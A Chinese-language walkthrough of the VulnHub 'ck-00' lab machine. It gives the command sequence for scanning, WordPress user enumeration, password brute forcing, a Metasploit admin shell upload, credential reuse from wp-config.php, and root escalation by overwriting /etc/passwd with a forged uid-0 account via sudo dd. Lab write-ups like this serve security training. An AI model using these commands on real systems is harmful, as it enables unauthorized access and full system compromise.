靶机地址:https://www.vulnhub.com/entry/ck-00,444/
靶机网络有问题,先进入单用户模式把 /etc/netplan/50-cloud-init.yaml 里面的网卡名称改成ens33(具体网卡名称和配置文件因人而异)
用nmap扫描获取靶机ip:192.168.40.161
nmap -sP 192.168.40.0/24
获取靶机开放的端口,开放了22和80端口
nmap -sV -p- 192.168.40.161
用dirb扫描目录,发现网站使用的是wordpress
用wpscan枚举用户
wpscan --url 192.168.40.161 -eu
找到admin用户,用rockyou爆破用户密码
wpscan --url 192.168.40.161 -U admin -P /usr/share/wordlists/rockyou.txt
成功爆破出密码admin,有了wordpress用户和密码就可以使用msf的wp_admin_shell_upload
use exploit/unix/webapp/wp_admin_shell_upload set username admin set password admin set rhost 192.168.40.161 run
用python3开启交互式tty
在/home/ck/ck00-local-flag找到第一个flag
在/var/www/html/wp-config.php找到了数据库的用户信息
正好系统的家目录下有bla这个用户,尝试用密码 bla_is_my_password 登录系统
成功登录系统,那用户 bla1 的密码说不定是 bla1_is_my_password
尝试之后发现可以登录bla1,下一步就是提权 ,先用sudo -l 查看可以使用的权限
发现可以以 ck-00 身份执行 /bin/rbash
再次 sudo -l 发现可以以root身份使用dd命令,dd命令主要用于转换和复制文件
那么我们可以伪造一个 passwd,然后用 dd 命令把伪造的 passwd 替换成 /etc/passwd ,这样就可以成功提权。因为 ck-00 是rbash,受限的bash,所以使用 bla1 把 /etc/passwd 重定向到 家目录
cat /etc/passwd > ~/passwd
然后利用kali生成用户 hacker 的密码
openssl passwd -1 -salt hacker 123456
再把 hacker 用户追加到 bla1家目录的 passwd
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:/root:/bin/bash' >> ~/passwd
然后切换成 ck-00 用户,把伪造好的 passwd 用 dd 命令 覆盖原来的 /etc/passwd
sudo -u ck-00 /bin/rbash sudo dd if=~/passwd of=/etc/passwd su hacker
